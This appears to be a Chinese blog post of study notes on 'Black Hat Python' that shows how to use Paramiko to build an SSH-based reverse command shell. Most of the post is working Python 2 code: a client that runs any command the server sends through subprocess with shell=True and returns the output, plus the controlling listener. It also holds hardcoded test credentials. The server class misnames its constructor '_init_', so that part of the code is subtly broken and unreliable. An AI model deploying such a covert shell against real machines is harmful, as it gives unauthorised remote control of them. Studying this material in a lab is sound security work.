Python黑帽子 黑客與滲透測試程式設計之道(五)通過Paramiko 使用SSH
阿新 • • 發佈:2018-12-19
使用我們編寫的bhnet工具介紹和傳送資料非常方便,但有時候需要通過加密流量來避免,這是更明智的選擇。最常用的辦法就是使用secure shell(SSH)傳送流量。
paramiko是用python語言寫的一個模組,遵循SSH2協議,支援以加密和認證的方式,進行遠端伺服器的連線。paramiko支援Linux, Solaris, BSD, MacOS X, Windows等平臺通過SSH從一個平臺連線到另外一個平臺。利用該模組,可以方便的進行ssh連線和sftp協議進行sftp檔案傳輸。
這個例子就是使用Paramiko庫中的PyCrypto。
首先安裝Paramiko:
[email protected] :~# pip install paramiko
Requirement already satisfied (use --upgrade to upgrade): paramiko in /usr/lib/python2.7/dist-packages
Requirement already satisfied (use --upgrade to upgrade): pycrypto>=2.1 in /usr/lib/python2.7/dist-packages (from paramiko)
Cleaning up...
這個版本自帶了,不用再安裝。
接下來建立一個新使用者,再執行書上程式碼之前,要先做如下準備工作:
啟動ssh服務
[email protected]:~# service ssh start
[ ok ] Starting OpenBSD Secure Shell server: sshd.
生成祕鑰: ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
新增使用者:
接著看下剛剛創好的使用者:
[email protected]ali:~# id theKing
uid=1001(theKing) gid=1002(theKing) groups=1002(theKing)
把這個使用者加到SSH伺服器:
import threading import paramiko import subprocess def ssh_command(ip, user, passwd, command): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(ip, username=user, password=passwd) ssh_session = client.get_transport().open_session() if ssh_session.active: ssh_session.exec_command(command) print ssh_session.recv(1024) return ssh_command('127.0.0.1', 'theKing', 'lebron', 'id')
必須要先建立使用者,和開啟SSH伺服器,這個程式碼才能執行。
[email protected]:~/test# python bh_sshcmd.py
uid=1001(theKing) gid=1002(theKing) groups=1002(theKing)
接下來改良一下這個程式碼:
import threading
import paramiko
import subprocess
def ssh_command(ip, user, passwd, command,port = 80):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, port,username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.send(command)
print ssh_session.recv(1024)
while True:
command =ssh_session.recv(1024)
try:
cmd_output = subprocess.check_output(command,shell=True)
ssh_session.send(cmd_output)
except Exception,e:
ssh_session.send(str(e))
client.close()
return
ssh_command('127.0.0.1', 'theKing', 'lebron', 'ClientConnected',80)
接著寫伺服器端:
import socket
import paramiko
import threading
import sys
host_key = paramiko.RSAKey(filename='/etc/ssh/ssh_host_rsa_key')
class Server (paramiko.ServerInterface):
def _init_(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if (username == 'theKing') and (password == 'lebron'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100)
print '[+] Listening for connection ...'
client, addr = sock.accept()
except Exception, e:
print '[-] Listen failed: ' + str(e)
sys.exit(1)
print '[+] Got a connection!'
try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException, x:
print '[-] SSH negotiation failed.'
chan = bhSession.accept(20)
print '[+] Authenticated!'
print chan.recv(1024)
chan.send('Welcome to bh_ssh')
while True:
try:
command = raw_input("Enter command: ").strip('\n')
if command != 'exit':
chan.send(command)
print chan.recv(1024) + '\n'
else:
chan.send('exit')
print 'exiting'
bhSession.close()
raise Exception ('exit')
except KeyboardInterrupt:
bhSession.close()
except Exception, e:
print '[-] Caught exception: ' + str(e)
try:
bhSession.close()
except:
pass
sys.exit(1)
這裡碰到一個問題,就是書上的程式碼,Paramiko示例檔案的祕鑰是在 host_key = paramiko.RSAkey(filename=‘test_rsa.key’) 這句話我顯示找不到檔案。 然後把檔案路徑改為剛剛生成祕鑰那個路徑就可以了。
執行結果: 在一個終端裡開啟伺服器:
在另一個終端裡開啟客戶端:
然後在伺服器端裡輸入命令,得到反饋結果:
輸入exit退出伺服器端: